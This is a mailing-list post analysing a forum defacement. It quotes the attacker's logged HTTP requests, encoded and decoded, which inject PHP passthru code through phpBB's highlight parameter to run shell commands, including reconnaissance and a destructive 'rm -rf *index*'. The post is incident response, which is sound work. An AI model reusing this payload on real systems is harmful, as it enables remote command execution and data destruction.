Benoit Audouard wrote : | Hi, | The forum was defaced at 13:42 today... | a nasty cracker replaced erased index.php at root of | http://forum.eagle-usb.org | with an index.html like this one : | | http://forum.eagle-usb.org/index_cracke.html | (contains only text)
OK. I just quickly looked at the logs:
At 13:42 :
"GET
/viewtopic.php?t=%31%39%32%38&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20%75%6E%61%6D%65%20%2D%61%3B%69%64%3B%75%70%74%69%6D%65%3B%70%77%64%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527
HTTP/1.1"
"GET/viewtopic.php?t=%31%39%32%38&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20%72%6D%20%2D%72%66%20%2A%69%6E%64%65%78%2A%3B%65%63%68%6F%20%4B%61%30%74%69%63%20%4C%61%62%20%3E%3E%20%69%6E%64%65%78%2E%68%74%6D%6C%3B%63%61%74%20%69%6E%64%65%78%2E%68%74%6D%6C%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527
HTTP/1.1"
Which together can be translated into:
"GET /viewtopic.php?t=1928&rush=echo _START_; uname -a;id;uptime;pwd;
echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1"
"GET /viewtopic.php?t=1928&rush=echo _START_; rm -rf *index*;echo Ka0tic
Lab >> index.html;cat index.html; echo >>
_END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1"
Nice one isn't it ? By chances they only did a rm *index* :)
The other fact is that the source address seems to originate directly
from brasiltelecom.net.br ...
I'm going to send a mail to brasiltelecom abuse service ... perhaps they
will have enough log to find this out ...
--
Frederick Ros aka Sleeper
Follow each decision as closely as possible with its associated action.
- The Elements of Programming Style (Kernighan & Plaugher)
pgp76WWnk25bV.pgp
Description: PGP signature
